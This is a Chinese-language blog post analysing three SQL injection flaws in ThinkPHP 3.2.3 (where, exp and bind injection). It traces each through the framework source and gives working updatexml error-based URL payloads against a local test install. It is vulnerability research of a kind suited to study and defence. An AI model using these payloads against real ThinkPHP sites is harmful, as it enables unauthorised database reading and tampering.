<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>ThinkPhp3.2.3注入漏洞总结 - Hexo</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="Hexo"><meta name="msapplication-TileImage" content="/img/favicon.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="Hexo"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta description="环境配置数据库连接配置  thinkphp3.2.3 where注入控制器 &amp;#x2F;Application&amp;#x2F;Home&amp;#x2F;Controller&amp;#x2F;IndexController.class.php   payload 1http:&amp;#x2F;&amp;#x2F;localhost&amp;#x2F;tp3&amp;#x2F;?id[where]&amp;#x3D;1%20and%201&amp;#x3D;updatexml(1,concat(0x7"><meta property="og:type" content="blog"><meta property="og:title" content="ThinkPhp3.2.3注入漏洞总结"><meta property="og:url" content="http://example.com/2021/04/20/ThinkPhp3-2-3%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"><meta property="og:site_name" content="Hexo"><meta property="og:description" content="环境配置数据库连接配置  thinkphp3.2.3 where注入控制器 &amp;#x2F;Application&amp;#x2F;Home&amp;#x2F;Controller&amp;#x2F;IndexController.class.php   payload 1http:&amp;#x2F;&amp;#x2F;localhost&amp;#x2F;tp3&amp;#x2F;?id[where]&amp;#x3D;1%20and%201&amp;#x3D;updatexml(1,concat(0x7"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://www.hualigs.cn/image/607e923dad073.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923dae04f.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923db9e10.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e92437644e.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e924305371.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923de6764.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923dcbc98.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923df0bb8.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923e02118.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e924155ec7.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e92431e9fe.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e92428e1eb.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923e1ab2f.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e92428e1eb.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e9241b5394.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e9241b5394.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e92400b9b7.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923fb01b1.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e924383547.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e924112362.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e92405be65.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923f74c7f.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e92424058c.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e92426c997.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923df0bb8.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e924209d7f.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923fe8d55.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e9240d4c79.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e924147690.jpg"><meta property="og:image" content="https://www.hualigs.cn/image/607e923f510cf.jpg"><meta property="article:published_time" content="2021-04-20T08:34:24.000Z"><meta property="article:modified_time" content="2021-04-20T08:48:10.417Z"><meta property="article:author" content="John Doe"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="https://www.hualigs.cn/image/607e923dad073.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://example.com/2021/04/20/ThinkPhp3-2-3%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"},"headline":"Hexo","image":["https://www.hualigs.cn/image/607e923dad073.jpg","https://www.hualigs.cn/image/607e923dae04f.jpg","https://www.hualigs.cn/image/607e923db9e10.jpg","https://www.hualigs.cn/image/607e92437644e.jpg","https://www.hualigs.cn/image/607e924305371.jpg","https://www.hualigs.cn/image/607e923de6764.jpg","https://www.hualigs.cn/image/607e923dcbc98.jpg","https://www.hualigs.cn/image/607e923df0bb8.jpg","https://www.hualigs.cn/image/607e923e02118.jpg","https://www.hualigs.cn/image/607e924155ec7.jpg","https://www.hualigs.cn/image/607e92431e9fe.jpg","https://www.hualigs.cn/image/607e92428e1eb.jpg","https://www.hualigs.cn/image/607e923e1ab2f.jpg","https://www.hualigs.cn/image/607e92428e1eb.jpg","https://www.hualigs.cn/image/607e9241b5394.jpg","https://www.hualigs.cn/image/607e9241b5394.jpg","https://www.hualigs.cn/image/607e92400b9b7.jpg","https://www.hualigs.cn/image/607e923fb01b1.jpg","https://www.hualigs.cn/image/607e924383547.jpg","https://www.hualigs.cn/image/607e924112362.jpg","https://www.hualigs.cn/image/607e92405be65.jpg","https://www.hualigs.cn/image/607e923f74c7f.jpg","https://www.hualigs.cn/image/607e92424058c.jpg","https://www.hualigs.cn/image/607e92426c997.jpg","https://www.hualigs.cn/image/607e923df0bb8.jpg","https://www.hualigs.cn/image/607e924209d7f.jpg","https://www.hualigs.cn/image/607e923fe8d55.jpg","https://www.hualigs.cn/image/607e9240d4c79.jpg","https://www.hualigs.cn/image/607e924147690.jpg","https://www.hualigs.cn/image/607e923f510cf.jpg"],"datePublished":"2021-04-20T08:34:24.000Z","dateModified":"2021-04-20T08:48:10.417Z","author":{"@type":"Person","name":"John Doe"},"description":"环境配置数据库连接配置  thinkphp3.2.3 where注入控制器 &#x2F;Application&#x2F;Home&#x2F;Controller&#x2F;IndexController.class.php   payload 1http:&#x2F;&#x2F;localhost&#x2F;tp3&#x2F;?id[where]&#x3D;1%20and%201&#x3D;updatexml(1,concat(0x7"}</script><link rel="canonical" href="http://example.com/2021/04/20/ThinkPhp3-2-3%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/"><link rel="icon" href="/img/favicon.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.12.0/css/all.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.12.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script><!--!--><!--!--><meta name="generator" content="Hexo 5.2.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/logo.svg" alt="Hexo" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/ppoffice/hexo-theme-icarus"><i class="fab fa-github"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2021-04-20T08:34:24.000Z" title="2021-04-20T08:34:24.000Z">2021-04-20</time>发表</span><span class="level-item"><time dateTime="2021-04-20T08:48:10.417Z" title="2021-04-20T08:48:10.417Z">2021-04-20</time>更新</span><span class="level-item">8 分钟读完 (大约1248个字)</span></div></div><h1 class="title is-3 is-size-4-mobile">ThinkPhp3.2.3注入漏洞总结</h1><div class="content"><h1 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h1><p>数据库连接配置</p>
<p><img src="https://www.hualigs.cn/image/607e923dad073.jpg"></p>
<h1 id="thinkphp3-2-3-where注入"><a href="#thinkphp3-2-3-where注入" class="headerlink" title="thinkphp3.2.3 where注入"></a>thinkphp3.2.3 where注入</h1><p>控制器</p>
<p>/Application/Home/Controller/IndexController.class.php</p>
<p><img src="https://www.hualigs.cn/image/607e923dae04f.jpg"></p>
<p><img src="https://www.hualigs.cn/image/607e923db9e10.jpg"></p>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;tp3&#x2F;?id[where]&#x3D;1%20and%201&#x3D;updatexml(1,concat(0x7e,(select database()),0x7e),1)#</span><br></pre></td></tr></table></figure>

<p><img src="https://www.hualigs.cn/image/607e92437644e.jpg"></p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>在<code>I()</code>方法上打一个断点，<code>I()</code>方法用来获取GET和POST参数</p>
<p><img src="https://www.hualigs.cn/image/607e924305371.jpg"></p>
<p>在<code>I()</code>方法中经过<code>htmlspecialchars()</code>处理，再经过functions.php中<code>think_filter</code>函数过滤，这两处过滤对payload没有影响，可以直接忽略</p>
<p><img src="https://www.hualigs.cn/image/607e923de6764.jpg"></p>
<p><img src="https://www.hualigs.cn/image/607e923dcbc98.jpg"></p>
<p>think_filter函数</p>
<p><img src="https://www.hualigs.cn/image/607e923df0bb8.jpg"></p>
<p>/ThinkPHP/Library/Think/Model.class.php</p>
<p>接下来进入<code>find()</code>方法处理 </p>
<p>参数经过Model.class.php中的<code>_parseOptions()</code>方法处理后带入select方法进行查询，可以看到注入语句在经过<code>_parseOptions()</code>后就变成了int类型，后面的语句被去除了。</p>
<p><img src="https://www.hualigs.cn/image/607e923e02118.jpg"></p>
<p><code>_parseOptions</code>执行前，注入语句没有发生变化</p>
<p><img src="https://www.hualigs.cn/image/607e924155ec7.jpg"></p>
<p>跟进·<code>_parseOptions()</code>，满足条件进入<code>_parseType()</code></p>
<p><img src="https://www.hualigs.cn/image/607e92431e9fe.jpg"></p>
<p>在经过<code>_parseType</code>处理后，注入语句被转换成了int型，只保留了前面的数字,注意这里的<code>$options[&#39;where&#39;]</code>是一个array</p>
<p><img src="https://www.hualigs.cn/image/607e92428e1eb.jpg"></p>
<p>跟进<code>_parseType()</code>，发现这里进行了强制类型转换，把payload强制转换成了int型，去掉了后面部分</p>
<p><img src="https://www.hualigs.cn/image/607e923e1ab2f.jpg"></p>
<h2 id="绕过"><a href="#绕过" class="headerlink" title="绕过"></a>绕过</h2><p>只要<code>is_array($options[&#39;where&#39;])</code>这个条件不满足，就不会进入到强制转换函数中，payload也就不会被过滤，所以要想办法让<code>$options[&#39;where&#39;]</code>不为数组</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>]) &amp;&amp; is_array(<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>]) &amp;&amp; !<span class="keyword">empty</span>(<span class="variable">$fields</span>) &amp;&amp; !<span class="keyword">isset</span>(<span class="variable">$options</span>[<span class="string">&#x27;join&#x27;</span>]))</span><br></pre></td></tr></table></figure>



<p>当我们传入的payload为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;45789 and 1&#x3D;updatexml(1,concat(0x7e,(select database()),0x7e),1)#</span><br></pre></td></tr></table></figure>

<p><code>_parseOptions</code>执行前，<code>$options[&#39;where&#39;]</code>就是一个数组了</p>
<p><img src="https://www.hualigs.cn/image/607e92428e1eb.jpg"></p>
<p><code>find()</code>函数开始存在一个判断，如果传入的参数为数字或者字符串，就会把他转换成数组再赋值给<code>$options[&#39;where&#39;]</code>，这样就会满足条件<code>is_array($options[&#39;where&#39;])</code>从而导致payload被转换。</p>
<p>这里传入<code>find()</code>的参数是<code>45789 and 1=updatexml(1,concat(0x7e,(select database()),0x7e),1)#</code>，满足了if判断中的条件，注入失败。</p>
<p><img src="https://www.hualigs.cn/image/607e9241b5394.jpg"></p>
<p>当payload为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id[where]&#x3D;45789 and 1&#x3D;updatexml(1,concat(0x7e,(select database()),0x7e),1)#</span><br></pre></td></tr></table></figure>

<p>if条件不满足</p>
<p><code>options[&#39;where&#39;]</code>就会是一个字符串，<code>is_array($options[&#39;where&#39;])</code>条件不满足，就成功绕过了</p>
<p><img src="https://www.hualigs.cn/image/607e9241b5394.jpg"></p>
<p>注入语句没有被转换，直接被带入执行。</p>
<p><img src="https://www.hualigs.cn/image/607e92400b9b7.jpg"></p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>注入产生的原因是构造的poc绕过了thinkphp对<code>$option[&#39;where&#39;]</code>是否是一个数组的判断，从而不满足<code>is_array($options[&#39;where&#39;])</code>，绕过了<code>_parseType</code>函数过滤，从而导致了注入。</p>
<h1 id="Thinkphp-3-2-3-exp注入"><a href="#Thinkphp-3-2-3-exp注入" class="headerlink" title="Thinkphp 3.2.3 exp注入"></a>Thinkphp 3.2.3 exp注入</h1><p>控制器</p>
<p><img src="https://www.hualigs.cn/image/607e923fb01b1.jpg"></p>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;tp3&#x2F;?username[0]&#x3D;exp&amp;username[1]&#x3D;&#x3D;1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)</span><br></pre></td></tr></table></figure>

<p><img src="https://www.hualigs.cn/image/607e924383547.jpg"></p>
<p><code>find()</code>执行到</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$resultSet</span>=<span class="keyword">$this</span>-&gt;db-&gt;select(<span class="variable">$options</span>);</span><br></pre></td></tr></table></figure>

<p><img src="https://www.hualigs.cn/image/607e924112362.jpg"></p>
<p>/ThinkPHP/Library/Think/Db/Driver.class.php</p>
<p>进入<code>select()</code></p>
<p><img src="https://www.hualigs.cn/image/607e92405be65.jpg"></p>
<p>进入<code>buildSelectSql()</code></p>
<p><img src="https://www.hualigs.cn/image/607e923f74c7f.jpg"></p>
<p>进入<code>parsesql()</code>，关注<code>parseWhere()</code>函数</p>
<p><img src="https://www.hualigs.cn/image/607e92424058c.jpg"></p>
<p><code>parseWhere()</code>函数调用<code>parseWhereItem()</code></p>
<p>elseif语句中直接拼接了where条件到sql语句中，到达该语句需要满足两个条件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(is_array(<span class="variable">$val</span>)) &#123;</span><br><span class="line">            <span class="keyword">if</span>(is_string(<span class="variable">$val</span>[<span class="number">0</span>]))</span><br></pre></td></tr></table></figure>

<p>由于<code>$exp=strtolower($val[0]);</code>，传入<code>username[0]=exp&amp;username[1]=1 and 1=1</code></p>
<p><img src="https://www.hualigs.cn/image/607e92426c997.jpg"></p>
<p>注意控制器那里不能使用<code>I()</code>方法来获取参数，因为前面提到<code>I()</code>方法中调用了<code>think_filter()</code>函数，该函数会过滤exp，导致注入失败</p>
<p><img src="https://www.hualigs.cn/image/607e923df0bb8.jpg"></p>
<h1 id="thinkphp-3-2-3-bind注入"><a href="#thinkphp-3-2-3-bind注入" class="headerlink" title="thinkphp 3.2.3 bind注入"></a>thinkphp 3.2.3 bind注入</h1><p>控制器</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="variable">$User</span> = M(<span class="string">&quot;Users&quot;</span>);</span><br><span class="line">    <span class="variable">$user</span>[<span class="string">&#x27;id&#x27;</span>] = I(<span class="string">&#x27;id&#x27;</span>);</span><br><span class="line">    <span class="variable">$data</span>[<span class="string">&#x27;password&#x27;</span>] = I(<span class="string">&#x27;password&#x27;</span>);</span><br><span class="line">    <span class="variable">$valu</span> = <span class="variable">$User</span>-&gt;where(<span class="variable">$user</span>)-&gt;save(<span class="variable">$data</span>);</span><br><span class="line">    var_dump(<span class="variable">$valu</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;tp3&#x2F;?id[0]&#x3D;bind&amp;id[1]&#x3D;0 and updatexml(1,concat(0x7e,user(),0x7e),1)&amp;password&#x3D;1</span><br></pre></td></tr></table></figure>

<p><img src="https://www.hualigs.cn/image/607e924209d7f.jpg"></p>
<p>这里需要注意<code>id[1]=0</code>原理在下面说</p>
<p><code>save()</code>函数中添加断点</p>
<p><img src="https://www.hualigs.cn/image/607e923fe8d55.jpg"></p>
<p>/ThinkPHP/Library/Think/Db/Driver.class.php</p>
<p>进入<code>update()</code></p>
<p>又经过了<code>parseWhere()</code>函数，除了之前利用的<code>exp</code>还有<code>bind</code>可以利用</p>
<p><img src="https://www.hualigs.cn/image/607e9240d4c79.jpg"></p>
<p>直接传递payload，发现添加了冒号，注入失败</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;tp3&#x2F;?id[0]&#x3D;bind&amp;id[1]&#x3D;1</span><br></pre></td></tr></table></figure>

<p><img src="https://www.hualigs.cn/image/607e924147690.jpg"></p>
<p>可以看到<code>bindParam()</code>添加冒号</p>
<p><img src="https://www.hualigs.cn/image/607e923f510cf.jpg"></p>
<p>ThinkPHP/Library/Think/Db/Driver.class.php</p>
<p><code>execute()</code>将<code>:0</code>替换为传入参数，让参数等于0，相当于<code>:0</code>，然后被替换为1，成功注入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;bind))&#123;</span><br><span class="line">            <span class="variable">$that</span>   =   <span class="keyword">$this</span>;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;queryStr =   strtr(<span class="keyword">$this</span>-&gt;queryStr,array_map(<span class="function"><span class="keyword">function</span>(<span class="params"><span class="variable">$val</span></span>) <span class="title">use</span>(<span class="params"><span class="variable">$that</span></span>)</span>&#123; <span class="keyword">return</span> <span class="string">&#x27;\&#x27;&#x27;</span>.<span class="variable">$that</span>-&gt;escapeString(<span class="variable">$val</span>).<span class="string">&#x27;\&#x27;&#x27;</span>; &#125;,<span class="keyword">$this</span>-&gt;bind));</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>



<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/-qing-/p/11444871.html">https://www.cnblogs.com/-qing-/p/11444871.html</a></p>
<p><a target="_blank" rel="noopener" href="https://darkless.cn/2020/06/07/thinkphp3.2.3-sqli/">https://darkless.cn/2020/06/07/thinkphp3.2.3-sqli/</a></p>
<p><a target="_blank" rel="noopener" href="https://syst1m.com/post/summary-of-thinkphp3-vulnerability/">https://syst1m.com/post/summary-of-thinkphp3-vulnerability/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.chabug.org/audit/1062.html">https://www.chabug.org/audit/1062.html</a></p>
</div><div class="article-licensing box"><div class="licensing-title"><p>ThinkPhp3.2.3注入漏洞总结</p><p><a href="http://example.com/2021/04/20/ThinkPhp3-2-3%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/">http://example.com/2021/04/20/ThinkPhp3-2-3%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>作者</h6><p>John Doe</p></div></div><div class="level-item is-narrow"><div><h6>发布于</h6><p>2021-04-20</p></div></div><div class="level-item is-narrow"><div><h6>更新于</h6><p>2021-04-20</p></div></div><div class="level-item is-narrow"><div><h6>许可协议</h6><p><a class="icon" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a><a class="icon" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a><a class="icon" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="notification is-danger">You need to set <code>install_url</code> to use ShareThis. Please set it in <code>_config.yml</code>.</div></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">喜欢这篇文章？打赏一下作者吧</h3><div class="buttons is-centered"><a class="button donate" href="/" target="_blank" rel="noopener" data-type="afdian"><span class="icon is-small"><i class="fas fa-charging-station"></i></span><span>爱发电</span></a><a class="button donate" data-type="alipay"><span class="icon is-small"><i class="fab fa-alipay"></i></span><span>支付宝</span><span class="qrcode"><img src="/" alt="支付宝"></span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="buymeacoffee"><span class="icon is-small"><i class="fas fa-coffee"></i></span><span>送我杯咖啡</span></a><a class="button donate" href="/" target="_blank" rel="noopener" data-type="patreon"><span class="icon is-small"><i class="fab fa-patreon"></i></span><span>Patreon</span></a><div class="notification is-danger">You forgot to set the <code>business</code> or <code>currency_code</code> for Paypal. Please set it in <code>_config.yml</code>.</div><a class="button donate" data-type="wechat"><span class="icon is-small"><i class="fab fa-weixin"></i></span><span>微信</span><span class="qrcode"><img src="/" alt="微信"></span></a></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2021/04/19/php%E5%8E%9F%E7%94%9F%E7%B1%BB%E5%88%A9%E7%94%A8/"><span class="level-item">php原生类利用</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><div class="card"><div class="card-content"><h3 class="title is-5">评论</h3><div class="notification is-danger">You forgot to set the <code>shortname</code> for Disqus. Please set it in <code>_config.yml</code>.</div></div></div></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1"><div class="card widget" data-type="profile"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="avatar" src="https://i.loli.net/2021/04/15/mxulK15prYAkXbI.png" alt="Sp4z"></figure><p class="title is-size-4 is-block" style="line-height:inherit;">Sp4z</p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">文章</p><a href="/archives"><p class="title">35</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">分类</p><a href="/categories"><p class="title">0</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">标签</p><a href="/tags"><p class="title">0</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/ppoffice" target="_blank" rel="noopener">关注我</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/ppoffice"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Facebook" href="https://facebook.com"><i class="fab fa-facebook"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Twitter" href="https://twitter.com"><i class="fab fa-twitter"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Dribbble" href="https://dribbble.com"><i class="fab fa-dribbble"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/"><i class="fas fa-rss"></i></a></div></div></div><!--!--><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">链接</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://hexo.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Hexo</span></span><span class="level-right"><span class="level-item tag">hexo.io</span></span></a></li><li><a class="level is-mobile" href="https://bulma.io" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">Bulma</span></span><span class="level-right"><span class="level-item tag">bulma.io</span></span></a></li></ul></div></div></div><!--!--><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-04-20T08:34:24.000Z">2021-04-20</time></p><p class="title"><a href="/2021/04/20/ThinkPhp3-2-3%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/">ThinkPhp3.2.3注入漏洞总结</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-04-19T13:41:01.000Z">2021-04-19</time></p><p class="title"><a href="/2021/04/19/php%E5%8E%9F%E7%94%9F%E7%B1%BB%E5%88%A9%E7%94%A8/">php原生类利用</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-04-17T05:24:56.000Z">2021-04-17</time></p><p class="title"><a href="/2021/04/17/JNDI%E6%B3%A8%E5%85%A5/">JNDI注入</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-04-16T12:35:38.000Z">2021-04-16</time></p><p class="title"><a href="/2021/04/16/2021%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-web%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0/">2021红明谷ctf web部分复现</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-04-15T06:02:06.000Z">2021-04-15</time></p><p class="title"><a href="/2021/04/15/thinkphp-5-1-x-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-md/">thinkphp 5.1.x 反序列化漏洞分析.md</a></p></div></article></div></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">归档</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2021/04/"><span class="level-start"><span class="level-item">四月 2021</span></span><span class="level-end"><span class="level-item tag">11</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/03/"><span class="level-start"><span class="level-item">三月 2021</span></span><span class="level-end"><span class="level-item tag">10</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/02/"><span class="level-start"><span class="level-item">二月 2021</span></span><span class="level-end"><span class="level-item tag">8</span></span></a></li><li><a class="level is-mobile" href="/archives/2021/01/"><span class="level-start"><span class="level-item">一月 2021</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/12/"><span class="level-start"><span class="level-item">十二月 2020</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><li><a class="level is-mobile" href="/archives/2020/11/"><span class="level-start"><span class="level-item">十一月 2020</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li></ul></div></div></div><!--!--><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">订阅更新</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="订阅"></div></div></form></div></div></div><div class="card widget"><div class="card-content"><div class="notification is-danger">You need to set <code>client_id</code> and <code>slot_id</code> to show this AD unit. Please set it in <code>_config.yml</code>.</div></div></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.svg" alt="Hexo" height="28"></a><p class="is-size-7"><span>&copy; 2021 John Doe</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p></div><div 